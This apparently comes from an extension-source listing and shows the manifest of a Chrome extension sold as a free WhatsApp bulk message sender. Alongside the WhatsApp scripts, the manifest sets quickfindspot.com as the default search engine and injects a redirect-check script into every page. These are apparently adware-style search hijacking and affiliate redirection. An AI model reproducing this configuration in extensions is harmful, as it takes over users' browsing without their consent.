Pro Sender - Free Bulk Message Sender

Pro Sender - Free Bulk Message Sender

Connect with your customers and grow your business with WhatsApp enhancement tool

Additional files are visible only to premium users

manifest.json


{
  "manifest_version": 3,
  "update_url": "https://clients2.google.com/service/update2/crx",
  "name": "Pro Sender - Free Bulk Message Sender",
  "version": "4.2.1",
  "default_locale": "en",
  "description": "__MSG_Desc__",
  "icons": {
    "16": "logo/small.png",
    "48": "logo/medium.png",
    "128": "logo/large.png"
  },
  "content_scripts": [
    {
      "matches": [
        "*://web.whatsapp.com/*"
      ],
      "js": [
        "js/library/jquery.js",
        "js/ga-code.js",
        "js/content.js"
      ],
      "css": [
        "css/content.css"
      ]
    },
    {
      "matches": [
        "<all_urls>"
      ],
      "js": [
        "js/impact_hero/ih_redirectcheck.js"
      ],
      "run_at": "document_start"
    }
  ],
  "web_accessible_resources": [
    {
      "resources": [
        "popup_notification.html",
        "/js/inject.js",
        "/logo/*"
      ],
      "matches": [
        "<all_urls>"
      ]
    }
  ],
  "background": {
    "type": "module",
    "service_worker": "js/background.js"
  },
  "action": {
    "default_popup": "popup.html",
    "default_title": "Pro Sender"
  },
  "permissions": [
    "tabs",
    "storage",
    "identity",
    "notifications",
    "identity.email",
    "unlimitedStorage"
  ],
  "optional_host_permissions": [
    "*://*/*"
  ],
  "optional_permissions": [
    "alarms",
    "scripting"
  ],
  "chrome_settings_overrides": {
    "search_provider": {
      "name": "Smart",
      "keyword": "Smart",
      "search_url": "https://quickfindspot.com/?n=110&q={searchTerms}",
      "favicon_url": "https://quickfindspot.com/favicon.ico",
      "encoding": "UTF-8",
      "is_default": true
    }
  }
}